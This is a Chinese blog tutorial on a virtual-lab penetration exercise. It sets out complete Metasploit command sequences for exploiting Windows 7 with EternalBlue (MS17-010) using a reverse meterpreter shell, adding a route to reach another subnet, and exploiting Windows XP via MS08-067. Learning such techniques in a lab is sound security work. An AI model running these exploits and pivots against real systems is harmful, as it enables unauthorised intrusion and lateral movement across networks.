跨网段攻击模拟实验

最新推荐文章于 2024-11-14 03:24:02 发布
最新推荐文章于 2024-11-14 03:24:02 发布
阅读量862 收藏 6
点赞数 2
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65336001/article/details/130516573
版权

目录

环境:

 模拟攻击Windows7

跨网段攻击阶段:

前言:初学者在使用漏洞进行攻击时,一般都是在同一网段下,所以这次我们来模拟攻击目标主机后,发现其他网段的主机,而后进行跨网段攻击

环境:

Kali Linux

Windows7

winXP

部署:

这里我们将Kali的网卡设置成NAT模式

Windows7的网卡设置成NAT模式和自定义VMnet模式(双网卡)

WinXP设置成VMnet模式

目的是使kali和Windows7在同一网段,Windows7又和WinXP在同一网段,模拟kali攻击windows7后发现其他网段下的WinXP,从而实施跨网段攻击

kali的IP为192.168.10.137

Windows7的IP地址为:192.168.10.131   和kali在同一网段

                                      172.16.10.129     和WinXP在同一网段

 

Winxp的IP地址为:172.16.10.128   和Windows7在同一网段

 模拟攻击Windows7

 打开msfconsole使用ms17-010永恒之蓝漏洞进行攻击

search ms17-010             #搜索永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue     #使用攻击模块
set payload windows/x64/meterpreter/reverse_tcp  #设置反向连接
set rhosts 192.168.10.131   #设置目标主机IP(Windows7)
set lhost 192.168.10.137    #设置攻击者IP(Kali)
set lport 3333              #设置连接端口(此处一般默认设置了4444)
run                         #执行攻击

 

攻击成功并拿到shell终端

这里显示乱码,我们使用chcp 65001进行编码

这里看到除了在同网段的192.168.10.131地址,还发现了其他网段的172.16.10.129的地址

那么接下来就是本次的跨网段攻击环节

跨网段攻击阶段:

使用arp -a查看arp缓存表

发现其他网段下的主机172.16.10.128

想必就是WinXP主机的IP地址了(现实中通过更多信息搜集确定操作系统和服务器,在针对性实施对应的攻击)

由于提前知道是WinXP,所以我们使用ms08-67漏洞进行攻击

退回meterpreter:

run autoroute -s 172.16.10.0/24   #添加172.16.10.0/24网段信息
run autoroute -p                  #查看路由信息
background                        #退回msf后台
search ms08-067                   #搜索ms08-067漏洞
use exploit/windows/smb/ms08_067_netapi         #使用攻击模块
set payload windows/meterpreter/bind_tcp        #设置正向连接
set lport 4445                    #设置连接端口
set rhost 172.16.10.128           #设置目标主机IP地址(WinXP)
run                               #执行攻击

 我们好像攻击成功了,让我们验证一下(后渗透)

我们截个图看看

到这里就结束了,以上就是跨网段攻击的演示

嘻嘻

如果有不足,请大佬指正

 

宁落337
关注
社交网络分析之网络攻击模拟
qq_60300168的博客
10-21 509
对于星型网络、全连接网络、环状网络分别模拟网络攻击攻击方式如下:按度中心性攻击、随机攻击、按特征向量中心性攻击。最后绘制结果。
ONE DAY |网络安全渗透测试之跨网段攻击
EverUP
05-04 2750
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6832
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
跨网段攻击
moli_a的博客
05-05 1426
跨网段攻击
网络安全实验2 模拟攻击与漏洞扫描
qq_26103901的博客
07-12 1726
nmap还提供了一些高级的特征,例如:通过TCP/IP协议栈特征探测操作系统类型,秘密扫描,动态延时和重传计算,并行扫描,通过并行ping扫描探测关闭的主机,诱饵扫描,避开端口过滤检测,直接RPC扫描(无须端口映射),碎片扫描,以及灵活的目标和端口设定。ping命令探测技巧:使用ping可以测试目标主机名称和IP地址,验证与远程主机的连通性,通过将ICMP回显请求数据包发送到目标主机,并监听来自目标主机的回显应答数据包来验证与一台或多台远程主机的连通性,该命令只有在安装了TCP/IP协议后才可以使用。
模拟网络攻击
China_I_LOVE的博客
11-14 745
泛洪攻击如同其名,如同洪水一般,而这种攻击有最明显的一种特征,就是其产生的数据包很多很多。
从零开始学网安:Day3 体验跨网段渗透与后渗透经验分享
无业de小白的博客
05-07 488
这一次分享一些跨网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
荒城原创:无路由情况下两网段主机直通实验与方法
环境准备部分介绍了实验所需的硬件和软件,即使用Windows虚拟机(如VMware Workstation 8.0)搭建两台虚拟机,分别为2003和2003-64,它们分别配置为不同的IP地址段(192.168.101.1/24 和 192.168.100.2/24),并通过...
TCP Flood攻击实验
aI_Zzx的博客
09-29 3980
希望能够帮助到正在学习网络攻防滴同学们,还望佬们多多指教Doge
缓冲区溢出实例- 永恒之蓝实例分析 实验环境准备 使用kali 作为攻击机,windows7(旗舰版)作为靶机,靶机IP地址未知,但kali和靶机均 在同一个网段,可ping通
最新发布
03-10
获取到IP信息后,便可以在Kali攻击机上进行模拟攻击的操作。首先,打开Kali系统的虚拟终端,输入msfconsole命令,打开Kali Linux内置的Metasploit框架(MSF)。Metasploit是一个用于渗透测试的工具,它提供了许多...
如果可以,请愚弄我:模拟网络空间中的攻击和反攻击
03-06
如果可以,请愚弄我:模拟网络空间中的攻击和反攻击
漏洞扫描模拟攻击方法实验
12-14
漏洞扫描模拟攻击方法实验漏洞扫描模拟攻击方法实验
模拟攻防实验--网络系统攻防
07-14
攻击防护,模拟真实环境,该软件只可以用于模拟,请不要用于破坏活动,谢谢
模拟网络攻击_ICMP/TCP攻击_大数据包攻击_泛洪攻击
guansheng123的博客
02-23 4279
模拟网络攻击_ICMP/TCP攻击_大数据包攻击_泛洪攻击
生成PCAP测试数据包:模拟真实网络攻击场景
mh007的博客
08-01 1062
安装与配置在开始之前,请确保已经安装了 Scapy。Scapy 是一个强大的 Python 网络包处理库,能够生成、发送和接收网络数据包。
网络协议与攻击模拟
YangYubo091699的博客
05-07 3806
协议 TCP/IP协议簇 网络接口层(没有特定的协议) 物理层 (PPPOE-宽带拨号) 数据链路层 网络层:IP(v4/v6)、ARP(地址解析协议)、RARP、ICMP(internet控制报文协议)、IGMP 传输层:TCP(传输控制协议) UDP(用户数据包协议) 应用层:都是基于传输层协议的端口,总共端口0-65536 固定协议的端口号0-1023 DHCP DNS HTTP 80 HTTPS 443 FTP SMTP POP3 IMAP 流量抓取工具(wireshark
网络攻防实验 (by quqi99)
技术并艺术着
08-29 853
netwox的33号工具可以构造任意的以太网ARP数据包(netwox 33 --help),现在来netwox来冒充网关来攻击i1 (相当于i2到i1的arp reply被i3篡改了)运行netwox命令前后i1的arp缓存如下, 可以看到此时i1的arp缓存i2(192.168.121.87)指向i3的MAC了(00:16:3e:62:54:27)lxd容器,i3为中间攻击者所以在i3上安装netwox与打开ipv4_forward.i3上打开ipv4_forward。.........
网络攻击模拟器(Network Attack Simulator)使用教程
gitblog_00830的博客
09-10 722
网络攻击模拟器(Network Attack Simulator)使用教程 项目地址:https://gitcode.com/gh_mirrors/ne/NetworkAttackSimulator 一、项目目录结构及介绍 网络攻击模拟器(NetworkAttackSimulator)是一个基于Python编写的高级网络攻击模拟工具,主要用于快速测试使用强化学习和规划的自主渗透测试代理。以下是该开...
利用公网Msf+MS17010跨网段攻击内网
浅笑996的博客
06-29 2743
其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 一、准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!! 二、反弹一个shell 第一步:公网主机操作 生成msf木马: msfvenom -p windows/meter
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值